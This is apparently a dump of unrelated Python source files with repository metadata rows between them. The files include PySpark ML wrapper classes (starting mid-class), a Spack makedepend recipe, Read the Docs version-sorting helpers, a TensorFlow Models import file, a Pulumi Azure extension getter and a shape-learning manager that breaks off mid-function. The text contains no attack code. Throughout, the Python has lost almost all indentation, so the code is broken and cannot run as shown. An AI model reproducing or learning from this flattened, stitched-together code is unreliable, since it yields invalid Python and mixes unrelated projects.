@staticmethod
def _empty_java_param_map() -> "JavaObject":
"""
Returns an empty Java ParamMap reference.
"""
return _jvm().org.apache.spark.ml.param.ParamMap()
def _to_java(self) -> "JavaObject":
"""
Transfer this instance's Params to the wrapped Java object, and return the Java object.
Used for ML persistence.
Meta-algorithms such as Pipeline should override this method.
Returns
-------
py4j.java_gateway.JavaObject
Java object equivalent to this instance.
"""
self._transfer_params_to_java()
return self._java_obj
@staticmethod
def _from_java(java_stage: "JavaObject") -> "JP":
"""
Given a Java object, create and return a Python wrapper of it.
Used for ML persistence.
Meta-algorithms such as Pipeline should override this method as a classmethod.
"""
def __get_class(clazz: str) -> Type[JP]:
"""
Loads Python class from its name.
"""
parts = clazz.split(".")
module = ".".join(parts[:-1])
m = __import__(module)
for comp in parts[1:]:
m = getattr(m, comp)
return m
stage_name = java_stage.getClass().getName().replace("org.apache.spark", "pyspark")
# Generate a default new instance from the stage_name class.
py_type = __get_class(stage_name)
if issubclass(py_type, JavaParams):
# Load information from java_stage to the instance.
py_stage = py_type()
py_stage._java_obj = java_stage
# SPARK-10931: Temporary fix so that persisted models would own params from Estimator
if issubclass(py_type, JavaModel):
py_stage._create_params_from_java()
py_stage._resetUid(java_stage.uid())
py_stage._transfer_params_from_java()
elif hasattr(py_type, "_from_java"):
py_stage = py_type._from_java(java_stage)
else:
raise NotImplementedError(
"This Java stage cannot be loaded into Python currently: %r" % stage_name
)
return py_stage
def copy(self: "JP", extra: Optional["ParamMap"] = None) -> "JP":
"""
Creates a copy of this instance with the same uid and some
extra params. This implementation first calls Params.copy and
then make a copy of the companion Java pipeline component with
extra params. So both the Python wrapper and the Java pipeline
component get copied.
Parameters
----------
extra : dict, optional
Extra parameters to copy to the new instance
Returns
-------
:py:class:`JavaParams`
Copy of this instance
"""
if extra is None:
extra = dict()
that = super(JavaParams, self).copy(extra)
if self._java_obj is not None:
that._java_obj = self._java_obj.copy(self._empty_java_param_map())
that._transfer_params_to_java()
return that
def clear(self, param: Param) -> None:
"""
Clears a param from the param map if it has been explicitly set.
"""
assert self._java_obj is not None
super(JavaParams, self).clear(param)
java_param = self._java_obj.getParam(param.name)
self._java_obj.clear(java_param)
@inherit_doc
class JavaEstimator(JavaParams, Estimator[JM], metaclass=ABCMeta):
"""
Base class for :py:class:`Estimator`s that wrap Java/Scala
implementations.
"""
@abstractmethod
def _create_model(self, java_model: "JavaObject") -> JM:
"""
Creates a model from the input Java model reference.
"""
raise NotImplementedError()
def _fit_java(self, dataset: DataFrame) -> "JavaObject":
"""
Fits a Java model to the input dataset.
        Parameters
        ----------
dataset : :py:class:`pyspark.sql.DataFrame`
input dataset
Returns
-------
py4j.java_gateway.JavaObject
fitted Java model
"""
assert self._java_obj is not None
self._transfer_params_to_java()
return self._java_obj.fit(dataset._jdf)
def _fit(self, dataset: DataFrame) -> JM:
java_model = self._fit_java(dataset)
model = self._create_model(java_model)
return self._copyValues(model)
@inherit_doc
class JavaTransformer(JavaParams, Transformer, metaclass=ABCMeta):
"""
Base class for :py:class:`Transformer`s that wrap Java/Scala
implementations. Subclasses should ensure they have the transformer Java object
available as _java_obj.
"""
def _transform(self, dataset: DataFrame) -> DataFrame:
assert self._java_obj is not None
self._transfer_params_to_java()
return DataFrame(self._java_obj.transform(dataset._jdf), dataset.sparkSession)
@inherit_doc
class JavaModel(JavaTransformer, Model, metaclass=ABCMeta):
"""
Base class for :py:class:`Model`s that wrap Java/Scala
implementations. Subclasses should inherit this class before
param mix-ins, because this sets the UID from the Java model.
"""
def __init__(self, java_model: Optional["JavaObject"] = None):
"""
Initialize this instance with a Java model object.
Subclasses should call this constructor, initialize params,
and then call _transfer_params_from_java.
This instance can be instantiated without specifying java_model,
        in which case it will be assigned later; that scenario is only used by
:py:class:`JavaMLReader` to load models. This is a bit of a
hack, but it is easiest since a proper fix would require
MLReader (in pyspark.ml.util) to depend on these wrappers, but
these wrappers depend on pyspark.ml.util (both directly and via
other ML classes).
"""
super(JavaModel, self).__init__(java_model)
if java_model is not None:
# SPARK-10931: This is a temporary fix to allow models to own params
# from estimators. Eventually, these params should be in models through
# using common base classes between estimators and models.
self._create_params_from_java()
self._resetUid(java_model.uid())
def __repr__(self) -> str:
return self._call_java("toString")
@inherit_doc
class JavaPredictor(Predictor, JavaEstimator[JM], _PredictorParams, Generic[JM], metaclass=ABCMeta):
"""
(Private) Java Estimator for prediction tasks (regression and classification).
"""
pass
@inherit_doc
class JavaPredictionModel(PredictionModel[T], JavaModel, _PredictorParams):
"""
(Private) Java Model for prediction tasks (regression and classification).
"""
@property # type: ignore[misc]
@since("2.1.0")
def numFeatures(self) -> int:
"""
Returns the number of features the model was trained on. If unknown, returns -1
"""
return self._call_java("numFeatures")
@since("3.0.0")
def predict(self, value: T) -> float:
"""
Predict label for the given features.
"""
return self._call_java("predict", value)
| 36.502155
| 100
| 0.635355
|
7f941fca30c1a0a3d5339d17399d5f6b02ee7591
| 1,648
|
py
|
Python
|
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | 1
|
2018-07-17T07:45:09.000Z
|
2018-07-17T07:45:09.000Z
|
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Makedepend(AutotoolsPackage):
"""makedepend - create dependencies in makefiles."""
homepage = "http://cgit.freedesktop.org/xorg/util/makedepend"
url = "https://www.x.org/archive/individual/util/makedepend-1.0.5.tar.gz"
version('1.0.5', 'efb2d7c7e22840947863efaedc175747')
depends_on('xproto@7.0.17:', type='build')
depends_on('pkgconfig', type='build')
| 43.368421
| 82
| 0.677184
|
2a7cffa5bdde7eb035b96c0139d4982abce2f926
| 4,146
|
py
|
Python
|
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | 1
|
2021-02-23T23:32:35.000Z
|
2021-02-23T23:32:35.000Z
|
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | null | null | null |
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | 6
|
2019-02-13T16:08:41.000Z
|
2020-03-12T14:17:14.000Z
|
# -*- coding: utf-8 -*-
"""Project version handling."""
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import unicodedata
import six
from packaging.version import InvalidVersion, Version
from readthedocs.builds.constants import (
LATEST_VERBOSE_NAME, STABLE_VERBOSE_NAME, TAG)
def parse_version_failsafe(version_string):
"""
Parse a version in string form and return Version object.
If there is an error parsing the string, ``None`` is returned.
:param version_string: version as string object (e.g. '3.10.1')
:type version_string: str or unicode
:returns: version object created from a string object
:rtype: packaging.version.Version
"""
if not isinstance(version_string, six.text_type):
uni_version = version_string.decode('utf-8')
else:
uni_version = version_string
try:
normalized_version = unicodedata.normalize('NFKD', uni_version)
ascii_version = normalized_version.encode('ascii', 'ignore')
final_form = ascii_version.decode('ascii')
return Version(final_form)
except (UnicodeError, InvalidVersion):
return None
def comparable_version(version_string):
"""
Can be used as ``key`` argument to ``sorted``.
The ``LATEST`` version shall always beat other versions in comparison.
``STABLE`` should be listed second. If we cannot figure out the version
number then we sort it to the bottom of the list.
:param version_string: version as string object (e.g. '3.10.1' or 'latest')
:type version_string: str or unicode
:returns: a comparable version object (e.g. 'latest' -> Version('99999.0'))
:rtype: packaging.version.Version
"""
comparable = parse_version_failsafe(version_string)
if not comparable:
if version_string == LATEST_VERBOSE_NAME:
comparable = Version('99999.0')
elif version_string == STABLE_VERBOSE_NAME:
comparable = Version('9999.0')
else:
comparable = Version('0.01')
return comparable
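# Hedged illustration (added here, not part of the upstream module): the special
# slugs sort above any real release, and unparseable strings sink to the bottom.
assert (comparable_version(LATEST_VERBOSE_NAME)
        > comparable_version(STABLE_VERBOSE_NAME)
        > comparable_version('2.0')
        > comparable_version('not-a-version'))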
def sort_versions(version_list):
"""
Take a list of Version models and return a sorted list.
:param version_list: list of Version models
:type version_list: list(readthedocs.builds.models.Version)
:returns: sorted list in descending order (latest version first) of versions
:rtype: list(tupe(readthedocs.builds.models.Version,
packaging.version.Version))
"""
versions = []
for version_obj in version_list:
version_slug = version_obj.verbose_name
comparable_version = parse_version_failsafe(version_slug)
if comparable_version:
versions.append((version_obj, comparable_version))
return list(
sorted(
versions,
key=lambda version_info: version_info[1],
reverse=True,
))
def highest_version(version_list):
"""
Return the highest version for a given ``version_list``.
:rtype: tupe(readthedocs.builds.models.Version, packaging.version.Version)
"""
versions = sort_versions(version_list)
if versions:
return versions[0]
return (None, None)
def determine_stable_version(version_list):
"""
Determine a stable version for version list.
:param version_list: list of versions
:type version_list: list(readthedocs.builds.models.Version)
:returns: version considered the most recent stable one or ``None`` if there
is no stable version in the list
:rtype: readthedocs.builds.models.Version
"""
versions = sort_versions(version_list)
versions = [(version_obj, comparable)
for version_obj, comparable in versions
if not comparable.is_prerelease]
if versions:
# We take preference for tags over branches. If we don't find any tag,
# we just return the first branch found.
for version_obj, comparable in versions:
if version_obj.type == TAG:
return version_obj
version_obj, comparable = versions[0]
return version_obj
return None
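# Hedged sketch (added for illustration): sort_versions only touches .verbose_name,
# so a hypothetical stand-in object is enough to see the ordering; the real argument
# is a list of readthedocs.builds.models.Version instances.
if __name__ == '__main__':
    from collections import namedtuple
    FakeVersion = namedtuple('FakeVersion', 'verbose_name')
    ordered = sort_versions([FakeVersion('1.0'), FakeVersion('2.0'), FakeVersion('1.10')])
    assert [v.verbose_name for v, _ in ordered] == ['2.0', '1.10', '1.0']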
| 30.940299
| 80
| 0.678003
|
e506913b0c22a84006e647058636fe08a7cb894b
| 1,178
|
py
|
Python
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 4
|
2019-11-02T14:47:46.000Z
|
2022-01-14T10:43:02.000Z
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 6
|
2021-10-05T18:53:55.000Z
|
2022-03-29T21:37:00.000Z
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 2
|
2021-11-30T21:50:03.000Z
|
2022-03-27T01:27:31.000Z
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow Models NLP Tasks."""
# pylint: disable=g-multiple-import
from official.nlp.tasks.electra_task import ElectraPretrainConfig, ElectraPretrainTask
from official.nlp.tasks.masked_lm import MaskedLMConfig, MaskedLMTask
from official.nlp.tasks.question_answering import QuestionAnsweringConfig, QuestionAnsweringTask
from official.nlp.tasks.sentence_prediction import SentencePredictionConfig, SentencePredictionTask
from official.nlp.tasks.tagging import TaggingConfig, TaggingTask
from official.nlp.tasks.translation import TranslationConfig, TranslationTask
| 51.217391
| 99
| 0.816638
|
69ab7e50b0f60af7c79a4e1da9dafbfb7bd41af7
| 10,170
|
py
|
Python
|
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetVMExtensionResult',
'AwaitableGetVirtualMachineScaleSetVMExtensionResult',
'get_virtual_machine_scale_set_vm_extension',
]
@pulumi.output_type
class GetVirtualMachineScaleSetVMExtensionResult:
"""
Describes a VMSS VM Extension.
"""
def __init__(__self__, auto_upgrade_minor_version=None, enable_automatic_upgrade=None, force_update_tag=None, id=None, instance_view=None, name=None, protected_settings=None, provisioning_state=None, publisher=None, settings=None, suppress_failures=None, type=None, type_handler_version=None):
if auto_upgrade_minor_version and not isinstance(auto_upgrade_minor_version, bool):
raise TypeError("Expected argument 'auto_upgrade_minor_version' to be a bool")
pulumi.set(__self__, "auto_upgrade_minor_version", auto_upgrade_minor_version)
if enable_automatic_upgrade and not isinstance(enable_automatic_upgrade, bool):
raise TypeError("Expected argument 'enable_automatic_upgrade' to be a bool")
pulumi.set(__self__, "enable_automatic_upgrade", enable_automatic_upgrade)
if force_update_tag and not isinstance(force_update_tag, str):
raise TypeError("Expected argument 'force_update_tag' to be a str")
pulumi.set(__self__, "force_update_tag", force_update_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_view and not isinstance(instance_view, dict):
raise TypeError("Expected argument 'instance_view' to be a dict")
pulumi.set(__self__, "instance_view", instance_view)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if protected_settings and not isinstance(protected_settings, dict):
raise TypeError("Expected argument 'protected_settings' to be a dict")
pulumi.set(__self__, "protected_settings", protected_settings)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if publisher and not isinstance(publisher, str):
raise TypeError("Expected argument 'publisher' to be a str")
pulumi.set(__self__, "publisher", publisher)
if settings and not isinstance(settings, dict):
raise TypeError("Expected argument 'settings' to be a dict")
pulumi.set(__self__, "settings", settings)
if suppress_failures and not isinstance(suppress_failures, bool):
raise TypeError("Expected argument 'suppress_failures' to be a bool")
pulumi.set(__self__, "suppress_failures", suppress_failures)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if type_handler_version and not isinstance(type_handler_version, str):
raise TypeError("Expected argument 'type_handler_version' to be a str")
pulumi.set(__self__, "type_handler_version", type_handler_version)
@property
@pulumi.getter(name="autoUpgradeMinorVersion")
def auto_upgrade_minor_version(self) -> Optional[bool]:
"""
Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
"""
return pulumi.get(self, "auto_upgrade_minor_version")
@property
@pulumi.getter(name="enableAutomaticUpgrade")
def enable_automatic_upgrade(self) -> Optional[bool]:
"""
Indicates whether the extension should be automatically upgraded by the platform if there is a newer version of the extension available.
"""
return pulumi.get(self, "enable_automatic_upgrade")
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> Optional[str]:
"""
How the extension handler should be forced to update even if the extension configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceView")
def instance_view(self) -> Optional['outputs.VirtualMachineExtensionInstanceViewResponse']:
"""
The virtual machine extension instance view.
"""
return pulumi.get(self, "instance_view")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the extension.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protectedSettings")
def protected_settings(self) -> Optional[Any]:
"""
The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
"""
return pulumi.get(self, "protected_settings")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def publisher(self) -> Optional[str]:
"""
The name of the extension handler publisher.
"""
return pulumi.get(self, "publisher")
@property
@pulumi.getter
def settings(self) -> Optional[Any]:
"""
Json formatted public settings for the extension.
"""
return pulumi.get(self, "settings")
@property
@pulumi.getter(name="suppressFailures")
def suppress_failures(self) -> Optional[bool]:
"""
Indicates whether failures stemming from the extension will be suppressed (Operational failures such as not connecting to the VM will not be suppressed regardless of this value). The default is false.
"""
return pulumi.get(self, "suppress_failures")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="typeHandlerVersion")
def type_handler_version(self) -> Optional[str]:
"""
Specifies the version of the script handler.
"""
return pulumi.get(self, "type_handler_version")
class AwaitableGetVirtualMachineScaleSetVMExtensionResult(GetVirtualMachineScaleSetVMExtensionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualMachineScaleSetVMExtensionResult(
auto_upgrade_minor_version=self.auto_upgrade_minor_version,
enable_automatic_upgrade=self.enable_automatic_upgrade,
force_update_tag=self.force_update_tag,
id=self.id,
instance_view=self.instance_view,
name=self.name,
protected_settings=self.protected_settings,
provisioning_state=self.provisioning_state,
publisher=self.publisher,
settings=self.settings,
suppress_failures=self.suppress_failures,
type=self.type,
type_handler_version=self.type_handler_version)
def get_virtual_machine_scale_set_vm_extension(expand: Optional[str] = None,
instance_id: Optional[str] = None,
resource_group_name: Optional[str] = None,
vm_extension_name: Optional[str] = None,
vm_scale_set_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetVMExtensionResult:
"""
Describes a VMSS VM Extension.
:param str expand: The expand expression to apply on the operation.
:param str instance_id: The instance ID of the virtual machine.
:param str resource_group_name: The name of the resource group.
:param str vm_extension_name: The name of the virtual machine extension.
:param str vm_scale_set_name: The name of the VM scale set.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['instanceId'] = instance_id
__args__['resourceGroupName'] = resource_group_name
__args__['vmExtensionName'] = vm_extension_name
__args__['vmScaleSetName'] = vm_scale_set_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute/v20210701:getVirtualMachineScaleSetVMExtension', __args__, opts=opts, typ=GetVirtualMachineScaleSetVMExtensionResult).value
return AwaitableGetVirtualMachineScaleSetVMExtensionResult(
auto_upgrade_minor_version=__ret__.auto_upgrade_minor_version,
enable_automatic_upgrade=__ret__.enable_automatic_upgrade,
force_update_tag=__ret__.force_update_tag,
id=__ret__.id,
instance_view=__ret__.instance_view,
name=__ret__.name,
protected_settings=__ret__.protected_settings,
provisioning_state=__ret__.provisioning_state,
publisher=__ret__.publisher,
settings=__ret__.settings,
suppress_failures=__ret__.suppress_failures,
type=__ret__.type,
type_handler_version=__ret__.type_handler_version)
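# Hypothetical usage sketch, not part of the generated SDK file above: one way
# the invoke defined above might be called from a Pulumi program. The resource
# group, scale set, instance id and extension name are placeholder values.
def example_lookup_vmss_vm_extension() -> AwaitableGetVirtualMachineScaleSetVMExtensionResult:
    # Looks up a single extension on instance "0" of a hypothetical scale set.
    return get_virtual_machine_scale_set_vm_extension(
        resource_group_name="example-rg",           # placeholder resource group
        vm_scale_set_name="example-vmss",           # placeholder VM scale set
        instance_id="0",                            # placeholder instance id
        vm_extension_name="CustomScriptExtension")  # placeholder extension name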
| 43.836207
| 297
| 0.682104
|
83859def4b5902c74a467c5a41907327a46060b4
| 1,931
|
py
|
Python
|
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | null | null | null |
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | 1
|
2021-06-02T00:46:48.000Z
|
2021-06-02T00:46:48.000Z
|
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | null | null | null |
"""
File: sort.py
Editor: Tiffany Nguyen
Date: December 7, 2019
Section: 01
Email: tn4@umbc.edu
Description: This file contains the function getPlayers() which reads in
the player database into a list data structure and returns it
Program Assumptions:
- Data including first name, last name, special, number, position, shoots,
height, and weight are stored in a database for the roster for all of
the 2019 players.
"""
from app.model import Player

DEFENSE_POSITION = "D"
GOALIE_POSITION = "G"
def getPlayers():
    '''
    queries the player database and stores each player's data in a list;
    the player lists are grouped by position in a dictionary
    : param: None
    : return: playerDictionary; dictionary formatted as follows:
        { "offense": [ [player-1-info] , . . . , [player-n-info] ],
          "defense": [ [player-1-info] , . . . , [player-n-info] ],
          "goalies": [ [player-1-info] , . . . , [player-n-info] ] }
    Preconditions: database with player information has already been created
    Postconditions: a dictionary containing players grouped by position
        is returned
    '''
# query database for all players
players = Player.query.all()
    # initialize player dictionary
playerDictionary = {"offense": [], "defense": [], "goalies": []}
for player in players:
# store player's data into a list
playerData = [player.firstName, player.lastName, player.special,\
player.number,player.position, player.shoots, \
player.height, player.weight]
# add the player's data to the appropriate list based on their position
if player.position == DEFENSE_POSITION:
playerDictionary["defense"].append(playerData)
elif player.position == GOALIE_POSITION:
playerDictionary["goalies"].append(playerData)
else:
playerDictionary["offense"].append(playerData)
return playerDictionary
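# Hypothetical usage sketch, not part of the original module: one way the
# dictionary returned by getPlayers() might be consumed, by summarizing how
# many players are stored under each position group.
def countPlayersByPosition():
    '''
    builds a small summary of the roster grouped by position
    : param: None
    : return: dictionary mapping "offense", "defense", and "goalies" to the
        number of players in each group
    '''
    roster = getPlayers()
    return {group: len(players) for group, players in roster.items()}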
| 37.134615
| 79
| 0.673744
|
208415751659cccaa6d79590ae25cc890a35ae86
| 12,244
|
py
|
Python
|
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | 2
|
2015-04-23T18:38:33.000Z
|
2015-05-02T21:31:56.000Z
|
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | null | null | null |
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | 4
|
2015-01-12T12:52:54.000Z
|
2018-07-05T01:22:03.000Z
|
#!/usr/bin/env python
"""
Manages a collection of shape_learners, with long-term memory about the
history of previous collections seen. An example is managing shape_learners
which represent letters, and the collections represent words.
"""
import logging; shapeLogger = logging.getLogger("shape_logger")
import os.path
from shape_learning.shape_learner import ShapeLearner
from recordtype import recordtype # for mutable namedtuple (dict might also work)
boundExpandingAmount = 0.
usePrevParamsWhenShapeReappears = True
Shape = recordtype('Shape', [('path', None), ('shapeID', None), ('shapeType', None), ('shapeType_code', None),
('paramsToVary', None), ('paramValues', None)])
def configure_logging(path):
if path:
if os.path.isdir(path):
path = os.path.join(path, "shapes.log")
handler = logging.FileHandler(path)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
else:
handler = logging.NullHandler()
shapeLogger.addHandler(handler)
shapeLogger.setLevel(logging.DEBUG)
# ##--------------------------------------------- WORD LEARNING FUNCTIONS
class ShapeLearnerManager:
def __init__(self, generateSettingsFunction, shapes_logging_path = "shapes.log"):
configure_logging(shapes_logging_path)
shapeLogger.info("**************** NEW SESSION ***************")
self.generateSettings = generateSettingsFunction
self.shapesLearnt = []
self.shapeLearners_all = []
self.shapeLearners_currentCollection = []
self.settings_shapeLearners_all = []
self.settings_shapeLearners_currentCollection = []
self.shapeLearnersSeenBefore_currentCollection = []
self.currentCollection = ""
self.collectionsLearnt = []
self.nextShapeLearnerToBeStarted = 0
def initialiseShapeLearners(self):
self.shapeLearners_currentCollection = []
self.settings_shapeLearners_currentCollection = []
self.shapeLearnersSeenBefore_currentCollection = []
for i in range(len(self.currentCollection)):
shapeType = self.currentCollection[i]
#check if shape has been learnt before
try:
shapeType_index = self.shapesLearnt.index(shapeType)
newShape = False
except ValueError:
newShape = True
self.shapeLearnersSeenBefore_currentCollection.append(not newShape)
if (newShape):
settings = self.generateSettings(shapeType)
shapeLearner = ShapeLearner(settings)
self.shapesLearnt.append(shapeType)
self.shapeLearners_all.append(shapeLearner)
self.settings_shapeLearners_all.append(settings)
self.shapeLearners_currentCollection.append(self.shapeLearners_all[-1])
self.settings_shapeLearners_currentCollection.append(self.settings_shapeLearners_all[-1])
else:
#use the bounds determined last time
previousBounds = self.shapeLearners_all[shapeType_index].getParameterBounds()
newInitialBounds = previousBounds
                newInitialBounds[0, 0] -= boundExpandingAmount  # USE ONLY FIRST PARAM FOR SELF-LEARNING ALGORITHM ATM
                newInitialBounds[0, 1] += boundExpandingAmount  # USE ONLY FIRST PARAM FOR SELF-LEARNING ALGORITHM ATM
self.shapeLearners_all[shapeType_index].setParameterBounds(newInitialBounds)
self.shapeLearners_currentCollection.append(self.shapeLearners_all[shapeType_index])
self.settings_shapeLearners_currentCollection.append(self.settings_shapeLearners_all[shapeType_index])
def startNextShapeLearner(self):
#start learning
if ( self.nextShapeLearnerToBeStarted < len(self.currentCollection) ):
shapeType = self.currentCollection[self.nextShapeLearnerToBeStarted]
shapeType_code = self.nextShapeLearnerToBeStarted
shape_index = self.indexOfShapeInCurrentCollection(shapeType)
if usePrevParamsWhenShapeReappears \
and self.shapeLearnersSeenBefore_currentCollection[self.nextShapeLearnerToBeStarted]: #shape has been seen before
[path, paramValues] = self.shapeLearners_currentCollection[shape_index].getLearnedShape()
shapeLogger.info("%s: continuing learning. Current params: %s. Path: %s" % (shapeType, paramValues.flatten().tolist(), path.flatten().tolist()))
else:
[path, paramValues] = self.shapeLearners_currentCollection[shape_index].startLearning()
shapeLogger.info("%s: starting learning. Initial params: %s. Path: %s" % (shapeType, paramValues.flatten().tolist(), path.flatten().tolist()))
paramsToVary = self.settings_shapeLearners_currentCollection[shape_index].paramsToVary
self.nextShapeLearnerToBeStarted += 1
shape = Shape(path=path, shapeID=0, shapeType=shapeType,
shapeType_code=shapeType_code, paramsToVary=paramsToVary, paramValues=paramValues)
return shape
else:
raise RuntimeError('Don\'t know what shape learner you want me to start...')
def feedbackManager(self, shapeIndex_messageFor, bestShape_index, noNewShape):
shape_messageFor = self.shapeAtIndexInCurrentCollection(shapeIndex_messageFor)
        if shape_messageFor == -1:
            shapeLogger.warning('Ignoring message because not for valid shape type')
            return -1
else:
if (noNewShape): #just respond to feedback, don't make new shape
self.shapeLearners_currentCollection[shapeIndex_messageFor].respondToFeedback(bestShape_index)
return 1
else:
[numItersConverged, newPath, newParamValues] = self.shapeLearners_currentCollection[
shapeIndex_messageFor].generateNewShapeGivenFeedback(bestShape_index)
paramsToVary = self.settings_shapeLearners_currentCollection[shapeIndex_messageFor].paramsToVary
shape = Shape(path=newPath, shapeID=[], shapeType=shape_messageFor,
shapeType_code=shapeIndex_messageFor, paramsToVary=paramsToVary, paramValues=newParamValues)
return numItersConverged, shape
def respondToDemonstration(self, shapeIndex_messageFor, shape):
shape_messageFor = self.shapeAtIndexInAllShapesLearnt(shapeIndex_messageFor)
        if shape_messageFor == -1:
            shapeLogger.warning('Ignoring demonstration because not for valid shape type')
            return -1
else:
newPath, newParamValues, params_demo = self.shapeLearners_currentCollection[shapeIndex_messageFor].respondToDemonstration(shape)
shapeLogger.info("%s: new demonstration. Params: %s. Path: %s" % (shape_messageFor, params_demo.flatten().tolist(), shape.flatten().tolist()))
paramsToVary = self.settings_shapeLearners_currentCollection[shapeIndex_messageFor].paramsToVary
shape = Shape(path=newPath,
shapeID=[],
shapeType=shape_messageFor,
shapeType_code=shapeIndex_messageFor,
paramsToVary=paramsToVary,
paramValues=newParamValues)
shapeLogger.info("%s: new generated model. Params: %s. Path: %s" % (shape_messageFor, newParamValues.flatten().tolist(), newPath.flatten().tolist()))
return shape
def indexOfShapeInCurrentCollection(self, shapeType):
try:
shapeType_index = self.currentCollection.index(shapeType)
